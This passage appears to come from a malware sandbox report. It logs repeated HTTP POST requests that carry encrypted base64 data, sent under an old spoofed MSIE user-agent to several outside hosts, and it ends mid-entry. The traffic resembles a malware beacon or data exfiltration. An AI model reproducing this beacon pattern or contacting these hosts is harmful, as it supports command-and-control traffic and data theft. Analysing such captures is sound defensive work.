                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheData Raw: 77 69 51 39 4b 70 44 6f 41 51 71 56 69 6e 71 51 49 79 4a 42 4e 30 4e 79 70 6d 47 34 6d 67 35 35 78 46 6a 33 43 68 72 64 44 37 6d 7a 57 7a 6d 54 6a 4d 33 4b 44 48 62 56 52 70 75 68 75 76 59 39 72 6d 51 36 61 35 70 57 38 6b 4f 77 68 56 7a 6d 5a 33 77 6e 73 7a 78 57 77 6b 4a 73 5a 59 4d 50 51 49 55 6b 6b 59 74 69 41 49 2b 35 36 50 4c 58 30 73 73 70 75 4a 4d 56 61 31 41 61 4e 34 72 77 4a 45 73 46 37 32 67 64 37 42 53 38 78 73 79 57 66 33 62 4c 42 6f 6a 4c 45 4d 4e 55 33 6c 44 31 57 58 6c 68 70 68 61 55 43 35 68 52 73 38 44 65 7a 4f 56 2f 53 4d 44 54 48 6a 41 4f 39 7a 4d 42 71 30 35 43 37 56 4f 2f 75 4f 6e 76 79 52 49 70 38 75 2b 6a 4c 71 74 54 37 58 77 77 47 76 4e 72 75 39 47 30 62 4c 78 64 65 68 37 79 36 71 57 6d 75 72 56 47 6e 71 49 75 55 54 75 62 4e 41 69 63 41 44 69 32 55 78 77 65 69 59 6d 50 73 77 46 46 47 34 79 54 48 32 58 42 4e 64 50 4e 36 69 61 62 50 65 4b 64 43 6b 42 59 34 4d 75 48 43 52 68 2b 64 69 55 78 66 61 5a 57 48 4c 53 62 63 58 64 4d 31 69 6a 34 4d 7a 54 56 45 36 72 6a 6a 74 30 30 4f 46 76 48 76 76 54 42 37 47 73 42 69 78 2f 53 42 54 61 76 54 68 49 6b 64 50 4f 75 52 78 5a 37 42 4e 56 30 59 55 67 66 63 76 44 78 4a 55 43 79 35 42 75 54 53 48 33 4d 6f 47 76 73 4f 54 6b 2b 74 74 55 46 61 33 57 44 61 4f 50 44 57 35 65 45 46 43 70 67 53 36 57 50 6a 4a 75 46 64 43 6f 33 34 64 46 31 6c 79 79 53 51 6e 37 49 30 64 63 77 67 42 47 6e 4f 44 30 77 62 75 55 5a 61 2f 58 34 72 69 52 72 4f 73 41 6b 5a 77 6b 42 59 38 32 54 36 30 2f 5a 6b 52 4c 55 6c 6a 4a 49 6d 57 34 47 65 4c 71 2f 31 70 59 4e 67 4e 50 57 58 44 39 37 58 51 2b 4c 61 52 59 51 75 55 75 35 54 56 72 62 59 73 6c 36 34 73 65 6c 72 34 31 63 45 4a 38 48 69 76 33 31 30 67 78 63 32 47 32 75 77 46 61 66 6a 74 66 4b 2f 34 69 30 75 77 3d 3d Data Ascii: wiQ9KpDoAQqVinqQIyJBN0NypmG4mg55xFj3ChrdD7mzWzmTjM3KDHbVRpuhuvY9rmQ6a5pW8kOwhVzmZ3wnszxWwkJsZYMPQIUkkYtiAI+56PLX0sspuJMVa1AaN4rwJEsF72gd7BS8xsyWf3bLBojLEMNU3lD1WXlhphaUC5hRs8DezOV/SMDTHjAO9zMBq05C7VO/uOnvyRIp8u+jLqtT7XwwGvNru9G0bLxdeh7y6qWmurVGnqIuUTubNAicADi2UxweiYmPswFFG4yTH2XBNdPN6iabPeKdCkBY4MuHCRh+diUxfaZWHLSbcXdM1ij4MzTVE6rjjt00OFvHvvTB7GsBix/SBTavThIkdPOuRxZ7BNV0YUgfcvDxJUCy5BuTSH3MoGvsOTk+ttUFa3WDaOPDW5eEFCpgS6WPjJuFdCo34dF1lyySQn7I0dcwgBGnOD0wbuUZa/X4riRrOsAkZwkBY82T60/ZkRLUljJImW4GeLq/1pYNgNPWXD97XQ+LaRYQuUu5TVrbYsl64selr41cEJ8Hiv310gxc2G2uwFafjtfK/4i0uw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 48 50 52 6b 71 4a 39 52 44 67 6f 63 65 53 30 43 2f 6e 49 31 62 43 67 74 34 54 4e 31 78 71 6b 79 51 36 50 6a 63 34 73 54 4a 6f 58 34 32 41 4b 41 65 6c 66 4a 52 73 4e 68 65 74 70 4e 31 4f 54 55 6e 4d 2f 69 79 6d 39 50 61 54 56 32 51 61 6a 36 73 72 55 62 6f 35 62 66 52 67 6e 6a 6e 5a 64 79 50 71 6d 53 69 79 41 49 68 54 63 64 33 76 58 56 54 62 52 59 50 6e 42 33 6e 47 71 2f 69 30 76 4b 47 51 2f 4e 42 30 51 30 59 67 63 56 62 70 4d 30 6b 48 6e 30 72 6a 41 4f 47 4a 41 74 5a 70 53 73 66 2f 6b 39 76 57 4f 4b 39 43 4a 4f 77 59 4f 74 76 6f 6e 71 5a 58 57 72 2b 53 65 4e 39 2f 54 4a 50 73 42 7a 36 34 7a 6c 63 53 6d 41 77 63 56 63 75 4b 62 6a 71 46 55 78 58 51 4b 34 77 50 52 34 62 36 6b 58 61 79 50 68 54 43 59 64 39 39 78 59 46 61 57 71 38 38 61 53 38 48 46 79 70 79 50 6f 7a 77 72 70 4d 63 2b 61 4f 62 47 72 44 7a 33 2f 5a 5a 6f 47 50 68 30 73 42 68 51 4a 32 72 6c 55 51 41 73 70 75 52 65 51 6e 4c 48 4e 66 4b 41 6d 79 74 70 44 63 34 73 71 77 51 4c 72 38 45 41 66 78 49 72 54 6c 75 34 6d 66 41 30 6e 75 73 77 38 31 4f 78 58 4e 4f 58 65 4d 32 6f 6a 4e 69 53 74 41 47 46 35 30 41 45 75 62 43 52 58 46 45 6f 36 49 4a 49 68 56 68 42 70 6d 55 66 70 39 33 72 5a 4f 33 31 51 79 4f 78 2b 48 36 53 2f 66 78 44 55 50 49 73 30 67 4e 7a 50 61 66 6a 54 6f 4f 6c 6c 46 47 41 59 50 69 44 62 6d 77 79 2f 77 35 34 31 78 46 48 2b 76 6a 52 2f 67 6c 72 37 63 54 74 31 33 2f 4b 74 5a 65 56 33 68 4d 39 69 76 74 70 62 67 4e 46 48 75 53 77 63 66 71 4f 65 53 61 67 6a 53 78 4c 5a 63 38 41 48 6a 44 62 64 4d 38 49 51 74 72 57 46 77 36 54 75 41 42 51 61 45 4a 6b 6e 41 41 57 56 32 70 33 61 6f 47 72 67 2f 74 77 72 69 51 68 75 41 4e 69 72 42 76 79 32 78 50 61 50 49 34 6f 51 6a 4c 2b 55 56 43 2b 36 7a 35 32 37 68 4b 37 52 47 45 2b 71 35 4c 73 56 31 4a 47 4f 43 57 51 56 77 6a 52 6e 6e 4d 79 50 Data Ascii: HPRkqJ9RDgoceS0C/nI1bCgt4TN1xqkyQ6Pjc4sTJoX42AKAelfJRsNhetpN1OTUnM/iym9PaTV2Qaj6srUbo5bfRgnjnZdyPqmSiyAIhTcd3vXVTbRYPnB3nGq/i0vKGQ/NB0Q0YgcVbpM0kHn0rjAOGJAtZpSsf/k9vWOK9CJOwYOtvonqZXWr+SeN9/TJPsBz64zlcSmAwcVcuKbjqFUxXQK4wPR4b6kXayPhTCYd99xYFaWq88aS8HFypyPozwrpMc+aObGrDz3/ZZoGPh0sBhQJ2rlUQAspuReQnLHNfKAmytpDc4sqwQLr8EAfxIrTlu4mfA0nusw81OxXNOXeM2ojNiStAGF50AEubCRXFEo6IJIhVhBpmUfp93rZO31QyOx+H6S/fxDUPIs0gNzPafjToOllFGAYPiDbmwy/w541xFH+vjR/glr7cTt13/KtZeV3hM9ivtpbgNFHuSwcfqOeSagjSxLZc8AHjDbdM8IQtrWFw6TuABQaEJknAAWV2p3aoGrg/twriQhuANirBvy2xPaPI4oQjL+UVC+6z527hK7RGE+q5LsV1JGOCWQVwjRnnMyP
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 48 50 52 6b 71 4a 39 52 44 67 6f 63 65 53 30 43 2f 6e 49 31 62 43 67 74 34 54 4e 31 78 71 6b 79 51 36 50 6a 63 34 73 54 4a 6f 58 34 32 41 4b 41 65 6c 66 4a 52 73 4e 68 65 74 70 4e 31 4f 54 55 6e 4d 2f 69 79 6d 39 50 61 54 56 32 51 61 6a 36 73 72 55 62 6f 35 62 66 52 67 6e 6a 6e 5a 64 79 50 71 6d 53 69 79 41 49 68 54 63 64 33 76 58 56 54 62 52 59 50 6e 42 33 6e 47 71 2f 69 30 76 4b 47 51 2f 4e 42 30 51 30 59 67 63 56 62 70 4d 30 6b 48 6e 30 72 6a 41 4f 47 4a 41 74 5a 70 53 73 66 2f 6b 39 76 57 4f 4b 39 43 4a 4f 77 59 4f 74 76 6f 6e 71 5a 58 57 72 2b 53 65 4e 39 2f 54 4a 50 73 42 7a 36 34 7a 6c 63 53 6d 41 77 63 56 63 75 4b 62 6a 71 46 55 78 58 51 4b 34 77 50 52 34 62 36 6b 58 61 79 50 68 54 43 59 64 39 39 78 59 46 61 57 71 38 38 61 53 38 48 46 79 70 79 50 6f 7a 77 72 70 4d 63 2b 61 4f 62 47 72 44 7a 33 2f 5a 5a 6f 47 50 68 30 73 42 68 51 4a 32 72 6c 55 51 41 73 70 75 52 65 51 6e 4c 48 4e 66 4b 41 6d 79 74 70 44 63 34 73 71 77 51 4c 72 38 45 41 66 78 49 72 54 6c 75 34 6d 66 41 30 6e 75 73 77 38 31 4f 78 58 4e 4f 58 65 4d 32 6f 6a 4e 69 53 74 41 47 46 35 30 41 45 75 62 43 52 58 46 45 6f 36 49 4a 49 68 56 68 42 70 6d 55 66 70 39 33 72 5a 4f 33 31 51 79 4f 78 2b 48 36 53 2f 66 78 44 55 50 49 73 30 67 4e 7a 50 61 66 6a 54 6f 4f 6c 6c 46 47 41 59 50 69 44 62 6d 77 79 2f 77 35 34 31 78 46 48 2b 76 6a 52 2f 67 6c 72 37 63 54 74 31 33 2f 4b 74 5a 65 56 33 68 4d 39 69 76 74 70 62 67 4e 46 48 75 53 77 63 66 71 4f 65 53 61 67 6a 53 78 4c 5a 63 38 41 48 6a 44 62 64 4d 38 49 51 74 72 57 46 77 36 54 75 41 42 51 61 45 4a 6b 6e 41 41 57 56 32 70 33 61 6f 47 72 67 2f 74 77 72 69 51 68 75 41 4e 69 72 42 76 79 32 78 50 61 50 49 34 6f 51 6a 4c 2b 55 56 43 2b 36 7a 35 32 37 68 4b 37 52 47 45 2b 71 35 4c 73 56 31 4a 47 4f 43 57 51 56 77 6a 52 6e 6e 4d 79 50 Data Ascii: HPRkqJ9RDgoceS0C/nI1bCgt4TN1xqkyQ6Pjc4sTJoX42AKAelfJRsNhetpN1OTUnM/iym9PaTV2Qaj6srUbo5bfRgnjnZdyPqmSiyAIhTcd3vXVTbRYPnB3nGq/i0vKGQ/NB0Q0YgcVbpM0kHn0rjAOGJAtZpSsf/k9vWOK9CJOwYOtvonqZXWr+SeN9/TJPsBz64zlcSmAwcVcuKbjqFUxXQK4wPR4b6kXayPhTCYd99xYFaWq88aS8HFypyPozwrpMc+aObGrDz3/ZZoGPh0sBhQJ2rlUQAspuReQnLHNfKAmytpDc4sqwQLr8EAfxIrTlu4mfA0nusw81OxXNOXeM2ojNiStAGF50AEubCRXFEo6IJIhVhBpmUfp93rZO31QyOx+H6S/fxDUPIs0gNzPafjToOllFGAYPiDbmwy/w541xFH+vjR/glr7cTt13/KtZeV3hM9ivtpbgNFHuSwcfqOeSagjSxLZc8AHjDbdM8IQtrWFw6TuABQaEJknAAWV2p3aoGrg/twriQhuANirBvy2xPaPI4oQjL+UVC+6z527hK7RGE+q5LsV1JGOCWQVwjRnnMyP
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 4a 6f 36 6b 4b 32 2b 46 4b 77 6f 65 39 59 46 2b 6a 76 53 6c 48 33 67 68 52 38 75 46 6e 76 35 64 45 37 52 2b 71 32 78 43 77 49 72 44 4c 2f 49 43 67 46 42 68 57 56 39 51 61 2b 32 4a 6d 6a 2f 6c 71 4b 6c 6a 2f 4b 66 65 57 7a 32 4b 2b 56 62 33 64 53 4c 44 35 73 31 31 33 61 2f 56 34 75 57 52 4b 45 63 59 44 36 5a 74 51 67 58 58 73 31 59 46 65 4f 4f 41 5a 72 78 54 71 52 63 38 34 34 33 31 65 53 61 54 75 37 31 66 6e 65 36 33 67 39 74 56 30 4e 4c 42 73 56 35 41 78 39 4c 78 69 51 77 50 72 63 52 63 35 54 41 77 76 79 66 6d 4c 6a 6d 32 38 30 75 51 6d 54 7a 55 46 57 2f 48 42 6a 36 52 64 5a 59 71 72 56 77 54 72 69 4f 50 48 38 44 37 46 4f 42 39 45 58 31 62 64 46 75 77 52 64 44 68 2f 33 30 70 6b 2b 43 56 6a 41 4e 2b 4c 54 36 39 6d 6b 47 76 4d 64 46 4e 34 48 77 58 50 6f 69 57 62 58 45 33 31 74 33 6f 44 5a 5a 76 54 74 71 47 63 54 76 6a 77 34 73 36 58 30 70 4c 36 64 73 74 74 70 58 37 79 6c 72 54 6d 4c 37 30 57 46 41 49 53 4a 6e 39 39 6e 6c 65 4d 32 45 61 55 64 6d 33 50 34 46 50 4c 71 50 47 55 6c 51 62 67 47 63 50 79 39 67 4b 36 37 32 6b 69 41 51 54 75 76 73 65 63 72 7a 58 6f 63 70 2b 35 44 53 36 6f 66 38 69 6c 37 38 70 38 5a 50 37 2b 32 6f 36 4e 5a 6b 75 64 74 32 37 49 37 38 72 59 76 4f 32 78 48 35 62 55 33 78 46 7a 42 73 33 77 42 4d 62 33 68 57 55 48 36 75 69 54 32 73 38 6a 49 31 69 79 6d 52 4d 6f 35 74 48 4c 6f 74 67 68 33 51 50 66 62 76 44 38 31 69 71 55 48 69 52 34 37 51 67 4e 7a 75 74 78 36 69 44 6c 69 4b 46 53 50 2f 52 42 46 34 4d 4d 4d 55 58 77 51 42 74 57 31 77 2b 78 75 2f 6d 55 36 35 76 61 38 4a 4f 52 70 33 48 43 4b 45 6e 77 63 54 59 54 66 39 6e 42 39 50 4d 66 61 32 4d 6a 4d 44 4e 61 49 66 44 37 74 64 55 6b 4c 62 79 4b 34 74 71 71 70 4e 47 Data Ascii: Jo6kK2+FKwoe9YF+jvSlH3ghR8uFnv5dE7R+q2xCwIrDL/ICgFBhWV9Qa+2Jmj/lqKlj/KfeWz2K+Vb3dSLD5s113a/V4uWRKEcYD6ZtQgXXs1YFeOOAZrxTqRc84431eSaTu71fne63g9tV0NLBsV5Ax9LxiQwPrcRc5TAwvyfmLjm280uQmTzUFW/HBj6RdZYqrVwTriOPH8D7FOB9EX1bdFuwRdDh/30pk+CVjAN+LT69mkGvMdFN4HwXPoiWbXE31t3oDZZvTtqGcTvjw4s6X0pL6dsttpX7ylrTmL70WFAISJn99nleM2EaUdm3P4FPLqPGUlQbgGcPy9gK672kiAQTuvsecrzXocp+5DS6of8il78p8ZP7+2o6NZkudt27I78rYvO2xH5bU3xFzBs3wBMb3hWUH6uiT2s8jI1iymRMo5tHLotgh3QPfbvD81iqUHiR47QgNzutx6iDliKFSP/RBF4MMMUXwQBtW1w+xu/mU65va8JORp3HCKEnwcTYTf9nB9PMfa2MjMDNaIfD7tdUkLbyK4tqqpNG
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 62 43 61 68 6d 41 54 61 62 77 6d 77 45 2f 61 33 48 35 31 65 6b 74 65 48 59 4d 45 38 61 34 2b 56 65 4d 2f 78 49 44 64 67 58 70 47 30 69 46 58 4a 71 71 65 73 55 71 32 77 6d 46 49 4c 47 4c 6d 68 2f 7a 35 4c 4c 6f 34 77 70 45 57 4d 6f 34 55 51 74 59 46 4e 50 77 69 6c 5a 6b 4c 77 36 37 38 76 53 4f 62 47 2b 54 42 4c 43 2f 6a 6d 2b 53 34 69 49 71 4c 57 53 77 6b 50 31 55 4e 45 35 34 61 4d 44 4d 52 57 58 6a 2f 50 39 48 30 4f 39 62 36 7a 55 58 5a 69 46 31 59 4e 53 71 4d 53 51 56 32 6f 55 59 54 36 38 44 79 55 31 52 47 36 50 4f 64 7a 51 47 59 45 5a 66 74 44 74 4c 67 38 42 51 45 78 33 67 75 43 76 71 77 57 78 4d 73 36 70 6b 68 54 69 47 51 6d 4f 78 37 4a 38 43 78 59 39 38 4a 57 32 79 68 74 44 36 44 5a 36 46 65 56 59 63 35 62 64 42 76 45 33 6e 50 53 4b 75 4c 48 37 4b 54 6b 7a 4e 50 58 39 5a 43 44 54 64 69 4b 71 38 71 58 63 70 4c 36 58 32 39 62 64 38 42 45 6a 30 72 42 6a 62 61 45 72 77 2f 50 53 42 76 68 30 4b 36 41 56 4c 47 61 6b 44 73 68 2b 2b 58 47 4d 6b 58 48 62 4a 79 48 54 6f 4f 71 56 75 36 6e 64 42 77 2b 61 53 69 69 6f 4c 7a 49 56 54 49 7a 4a 63 53 33 6b 4e 62 4f 47 4a 5a 41 73 38 7a 69 36 52 61 4b 78 76 39 69 78 56 69 7a 38 6a 31 68 75 35 4e 36 43 67 75 7a 53 6e 66 6a 39 32 4a 61 54 42 6d 52 76 6b 37 52 79 45 30 66 4a 50 56 68 48 54 45 63 4e 55 51 59 32 75 47 4d 7a 78 5a 6f 57 76 42 57 49 79 51 51 37 36 55 37 49 62 73 35 4f 35 35 36 59 34 51 34 72 33 42 79 78 4f 74 46 67 4f 77 71 31 51 64 55 2f 32 47 6e 44 57 74 73 6c 4c 61 6a 59 79 31 59 76 6f 7a 32 56 4b 6b 38 76 48 39 39 39 65 6c 39 62 6b 31 73 6c 59 67 38 76 56 51 74 47 51 5a 30 72 5a 69 59 42 67 5a 4f 2f 6d 4f 69 79 6b 63 31 51 48 52 4b 74 41 32 48 68 44 51 65 42 2f 2b 2b 63 67 52 50 7a 7a 2b 59 33 79 69 45 66 4a 39 32 45 33 49 3d Data Ascii: bCahmATabwmwE/a3H51ekteHYME8a4+VeM/xIDdgXpG0iFXJqqesUq2wmFILGLmh/z5LLo4wpEWMo4UQtYFNPwilZkLw678vSObG+TBLC/jm+S4iIqLWSwkP1UNE54aMDMRWXj/P9H0O9b6zUXZiF1YNSqMSQV2oUYT68DyU1RG6POdzQGYEZftDtLg8BQEx3guCvqwWxMs6pkhTiGQmOx7J8CxY98JW2yhtD6DZ6FeVYc5bdBvE3nPSKuLH7KTkzNPX9ZCDTdiKq8qXcpL6X29bd8BEj0rBjbaErw/PSBvh0K6AVLGakDsh++XGMkXHbJyHToOqVu6ndBw+aSiioLzIVTIzJcS3kNbOGJZAs8zi6RaKxv9ixViz8j1hu5N6CguzSnfj92JaTBmRvk7RyE0fJPVhHTEcNUQY2uGMzxZoWvBWIyQQ76U7Ibs5O556Y4Q4r3ByxOtFgOwq1QdU/2GnDWtslLajYy1Yvoz2VKk8vH999el9bk1slYg8vVQtGQZ0rZiYBgZO/mOiykc1QHRKtA2HhDQeB/++cgRPzz+Y3yiEfJ92E3I=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 62 43 61 68 6d 41 54 61 62 77 6d 77 45 2f 61 33 48 35 31 65 6b 74 65 48 59 4d 45 38 61 34 2b 56 65 4d 2f 78 49 44 64 67 58 70 47 30 69 46 58 4a 71 71 65 73 55 71 32 77 6d 46 49 4c 47 4c 6d 68 2f 7a 35 4c 4c 6f 34 77 70 45 57 4d 6f 34 55 51 74 59 46 4e 50 77 69 6c 5a 6b 4c 77 36 37 38 76 53 4f 62 47 2b 54 42 4c 43 2f 6a 6d 2b 53 34 69 49 71 4c 57 53 77 6b 50 31 55 4e 45 35 34 61 4d 44 4d 52 57 58 6a 2f 50 39 48 30 4f 39 62 36 7a 55 58 5a 69 46 31 59 4e 53 71 4d 53 51 56 32 6f 55 59 54 36 38 44 79 55 31 52 47 36 50 4f 64 7a 51 47 59 45 5a 66 74 44 74 4c 67 38 42 51 45 78 33 67 75 43 76 71 77 57 78 4d 73 36 70 6b 68 54 69 47 51 6d 4f 78 37 4a 38 43 78 59 39 38 4a 57 32 79 68 74 44 36 44 5a 36 46 65 56 59 63 35 62 64 42 76 45 33 6e 50 53 4b 75 4c 48 37 4b 54 6b 7a 4e 50 58 39 5a 43 44 54 64 69 4b 71 38 71 58 63 70 4c 36 58 32 39 62 64 38 42 45 6a 30 72 42 6a 62 61 45 72 77 2f 50 53 42 76 68 30 4b 36 41 56 4c 47 61 6b 44 73 68 2b 2b 58 47 4d 6b 58 48 62 4a 79 48 54 6f 4f 71 56 75 36 6e 64 42 77 2b 61 53 69 69 6f 4c 7a 49 56 54 49 7a 4a 63 53 33 6b 4e 62 4f 47 4a 5a 41 73 38 7a 69 36 52 61 4b 78 76 39 69 78 56 69 7a 38 6a 31 68 75 35 4e 36 43 67 75 7a 53 6e 66 6a 39 32 4a 61 54 42 6d 52 76 6b 37 52 79 45 30 66 4a 50 56 68 48 54 45 63 4e 55 51 59 32 75 47 4d 7a 78 5a 6f 57 76 42 57 49 79 51 51 37 36 55 37 49 62 73 35 4f 35 35 36 59 34 51 34 72 33 42 79 78 4f 74 46 67 4f 77 71 31 51 64 55 2f 32 47 6e 44 57 74 73 6c 4c 61 6a 59 79 31 59 76 6f 7a 32 56 4b 6b 38 76 48 39 39 39 65 6c 39 62 6b 31 73 6c 59 67 38 76 56 51 74 47 51 5a 30 72 5a 69 59 42 67 5a 4f 2f 6d 4f 69 79 6b 63 31 51 48 52 4b 74 41 32 48 68 44 51 65 42 2f 2b 2b 63 67 52 50 7a 7a 2b 59 33 79 69 45 66 4a 39 32 45 33 49 3d Data Ascii: bCahmATabwmwE/a3H51ekteHYME8a4+VeM/xIDdgXpG0iFXJqqesUq2wmFILGLmh/z5LLo4wpEWMo4UQtYFNPwilZkLw678vSObG+TBLC/jm+S4iIqLWSwkP1UNE54aMDMRWXj/P9H0O9b6zUXZiF1YNSqMSQV2oUYT68DyU1RG6POdzQGYEZftDtLg8BQEx3guCvqwWxMs6pkhTiGQmOx7J8CxY98JW2yhtD6DZ6FeVYc5bdBvE3nPSKuLH7KTkzNPX9ZCDTdiKq8qXcpL6X29bd8BEj0rBjbaErw/PSBvh0K6AVLGakDsh++XGMkXHbJyHToOqVu6ndBw+aSiioLzIVTIzJcS3kNbOGJZAs8zi6RaKxv9ixViz8j1hu5N6CguzSnfj92JaTBmRvk7RyE0fJPVhHTEcNUQY2uGMzxZoWvBWIyQQ76U7Ibs5O556Y4Q4r3ByxOtFgOwq1QdU/2GnDWtslLajYy1Yvoz2VKk8vH999el9bk1slYg8vVQtGQZ0rZiYBgZO/mOiykc1QHRKtA2HhDQeB/++cgRPzz+Y3yiEfJ92E3I=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 62 65 62 4c 58 55 77 39 48 67 73 64 31 77 47 62 74 31 6a 51 31 56 2f 79 37 62 67 6b 39 48 66 6e 51 44 74 56 35 58 52 42 6d 6d 67 4f 53 46 4d 43 50 5a 36 4e 31 5a 71 4e 51 68 4c 7a 56 4c 6e 76 41 63 52 32 75 67 6d 4d 56 5a 2b 74 72 78 61 63 72 4b 39 62 73 63 73 64 53 50 65 4b 57 56 71 52 41 54 67 42 71 41 30 52 54 46 65 4e 6f 52 72 68 73 63 39 2b 2f 77 65 33 51 71 2b 39 47 35 36 2b 38 51 2b 31 31 37 75 54 73 37 57 6c 48 7a 48 4d 71 67 74 77 42 65 34 6f 50 73 48 6b 41 4a 33 53 32 75 76 59 65 6f 67 42 62 4e 45 36 39 70 61 61 43 65 4c 65 4b 56 68 78 36 64 39 4e 35 76 37 4b 4e 68 44 77 7a 52 38 4a 70 66 4e 39 4b 36 69 61 78 35 70 6c 39 75 4c 36 66 30 41 58 67 6c 48 50 74 43 56 74 69 61 4a 6f 50 32 30 33 6d 73 45 45 66 2b 42 43 39 2f 6c 52 4f 51 73 35 53 7a 6f 71 6f 30 45 4f 67 35 30 53 62 4b 31 61 75 38 37 49 76 49 37 79 67 52 59 6e 4f 37 69 45 56 4e 6a 65 39 56 32 50 35 6a 59 66 72 38 53 69 73 45 64 4f 32 77 38 74 47 44 41 4d 75 6c 49 75 68 77 72 2f 75 47 78 36 33 4c 39 78 73 4c 76 67 56 2f 53 71 42 61 49 57 4a 2b 33 33 4b 31 78 4c 62 33 45 34 32 6d 73 63 56 33 6e 35 59 35 57 45 33 68 65 66 6b 6b 4d 67 62 55 78 79 4c 36 75 53 2b 6a 54 4e 46 47 58 7a 74 50 58 66 78 4e 77 44 2b 59 36 52 68 66 79 76 53 4c 35 4c 71 66 44 6b 73 69 2b 49 72 59 33 64 38 58 32 79 69 4b 63 48 76 63 39 78 35 65 30 50 41 2b 38 4c 7a 75 5a 61 78 6f 76 6e 68 68 30 72 41 50 77 76 47 48 4c 75 4e 4a 77 53 32 58 58 56 39 67 55 54 2b 55 2f 71 4b 6b 78 52 35 66 49 59 30 63 48 61 32 71 51 6d 4d 56 33 4f 47 69 65 5a 6e 72 72 72 54 61 78 6b 44 57 63 39 75 2f 74 76 73 62 6f 53 4a 49 32 49 59 53 4c 4c 6f 30 62 69 74 72 75 66 35 76 49 62 6e 35 42 43 4a 57 35 57 44 65 4e 63 37 33 78 57 65 64 78 6f 50 35 57 69 72 54 52 44 69 6b 67 3d Data Ascii: bebLXUw9Hgsd1wGbt1jQ1V/y7bgk9HfnQDtV5XRBmmgOSFMCPZ6N1ZqNQhLzVLnvAcR2ugmMVZ+trxacrK9bscsdSPeKWVqRATgBqA0RTFeNoRrhsc9+/we3Qq+9G56+8Q+117uTs7WlHzHMqgtwBe4oPsHkAJ3S2uvYeogBbNE69paaCeLeKVhx6d9N5v7KNhDwzR8JpfN9K6iax5pl9uL6f0AXglHPtCVtiaJoP203msEEf+BC9/lROQs5Szoqo0EOg50SbK1au87IvI7ygRYnO7iEVNje9V2P5jYfr8SisEdO2w8tGDAMulIuhwr/uGx63L9xsLvgV/SqBaIWJ+33K1xLb3E42mscV3n5Y5WE3hefkkMgbUxyL6uS+jTNFGXztPXfxNwD+Y6RhfyvSL5LqfDksi+IrY3d8X2yiKcHvc9x5e0PA+8LzuZaxovnhh0rAPwvGHLuNJwS2XXV9gUT+U/qKkxR5fIY0cHa2qQmMV3OGieZnrrrTaxkDWc9u/tvsboSJI2IYSLLo0bitruf5vIbn5BCJW5WDeNc73xWedxoP5WirTRDikg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 62 65 62 4c 58 55 77 39 48 67 73 64 31 77 47 62 74 31 6a 51 31 56 2f 79 37 62 67 6b 39 48 66 6e 51 44 74 56 35 58 52 42 6d 6d 67 4f 53 46 4d 43 50 5a 36 4e 31 5a 71 4e 51 68 4c 7a 56 4c 6e 76 41 63 52 32 75 67 6d 4d 56 5a 2b 74 72 78 61 63 72 4b 39 62 73 63 73 64 53 50 65 4b 57 56 71 52 41 54 67 42 71 41 30 52 54 46 65 4e 6f 52 72 68 73 63 39 2b 2f 77 65 33 51 71 2b 39 47 35 36 2b 38 51 2b 31 31 37 75 54 73 37 57 6c 48 7a 48 4d 71 67 74 77 42 65 34 6f 50 73 48 6b 41 4a 33 53 32 75 76 59 65 6f 67 42 62 4e 45 36 39 70 61 61 43 65 4c 65 4b 56 68 78 36 64 39 4e 35 76 37 4b 4e 68 44 77 7a 52 38 4a 70 66 4e 39 4b 36 69 61 78 35 70 6c 39 75 4c 36 66 30 41 58 67 6c 48 50 74 43 56 74 69 61 4a 6f 50 32 30 33 6d 73 45 45 66 2b 42 43 39 2f 6c 52 4f 51 73 35 53 7a 6f 71 6f 30 45 4f 67 35 30 53 62 4b 31 61 75 38 37 49 76 49 37 79 67 52 59 6e 4f 37 69 45 56 4e 6a 65 39 56 32 50 35 6a 59 66 72 38 53 69 73 45 64 4f 32 77 38 74 47 44 41 4d 75 6c 49 75 68 77 72 2f 75 47 78 36 33 4c 39 78 73 4c 76 67 56 2f 53 71 42 61 49 57 4a 2b 33 33 4b 31 78 4c 62 33 45 34 32 6d 73 63 56 33 6e 35 59 35 57 45 33 68 65 66 6b 6b 4d 67 62 55 78 79 4c 36 75 53 2b 6a 54 4e 46 47 58 7a 74 50 58 66 78 4e 77 44 2b 59 36 52 68 66 79 76 53 4c 35 4c 71 66 44 6b 73 69 2b 49 72 59 33 64 38 58 32 79 69 4b 63 48 76 63 39 78 35 65 30 50 41 2b 38 4c 7a 75 5a 61 78 6f 76 6e 68 68 30 72 41 50 77 76 47 48 4c 75 4e 4a 77 53 32 58 58 56 39 67 55 54 2b 55 2f 71 4b 6b 78 52 35 66 49 59 30 